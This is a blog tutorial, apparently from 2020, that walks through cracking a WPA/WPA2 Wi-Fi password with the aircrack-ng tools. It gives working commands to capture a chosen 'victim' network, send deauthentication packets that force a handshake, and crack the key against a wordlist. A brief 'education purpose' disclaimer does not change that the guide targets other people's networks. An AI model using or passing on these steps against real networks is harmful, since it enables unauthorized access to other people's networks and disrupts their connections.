WPA2 Wifi reset router Password

By | February 1, 2020

Today i will tell you how use Wifi Password Finder this is only for education purpose. Using other peoples internet (without permission) is illegal. Furthermore please read my WEP tutorial before you attempt to hack a WPA or WPA2 wifi https://www.arhixe.com/?p=528

Wifi Password Finder

Wifi Password Finder Guide.

Okay open up a terminal and type;

airmon-ng
By now (since you have already read my other tutorial) you should already know what this does but also know how to start you usb wifi. In this tutorial im going to activate and use wlan0 instead of mon0.

airmon-ng start wlan0

airodump-ng wlan0
now you should see other wifi. Just pick the wpa or wpa2 that you would like to hack and copy the bssid number. (in order to copy the bssid you may need to hold ctrl and press c ). now type;

[showads ad=post]

airodump-ng -c 11 -w example –bssid 00:11:22:33:44:55 wlan0

-c is the channel number of your victim
-w is the file name( you can call it whatever you want)
–bssid is the bssid number
so thus your -c, -w and bssid, should be different.

Now you should be sending packets to the victim but obviously it would be going very slow since there is no handshake agreement.Please wait for a couple of minutes till you get a station mac. Now once you get a station mac number, open up another terminal and type;

aireplay-ng -0 5 -c (station mac) -a (bssid number) wlan0

Example:
aireplay-ng -0 5 -c 66:77:88:99:00:11 -a 00:11:22:33:44:55 wlan0
obviously your station number and bssid number should be different.

Now if you have done this all correctly, you should receive a handshake agreement (check you first terminal it should be on the right hand corner indicating “WPA handshaking: (with the victims bssid)”.Now type;

dir

and find locate the file, for me the file should be example-01.cap.now type;

aircrack-ng example-01.cap -w /pentest/wireless/aircracck-ng/test/password.lst
Now obviously the backtrack password list is very small, so you can do a couple of things you can add your own password list ( which is good if you want to test you own wifi) or you can download password list from the wordlist forum

Comments

comments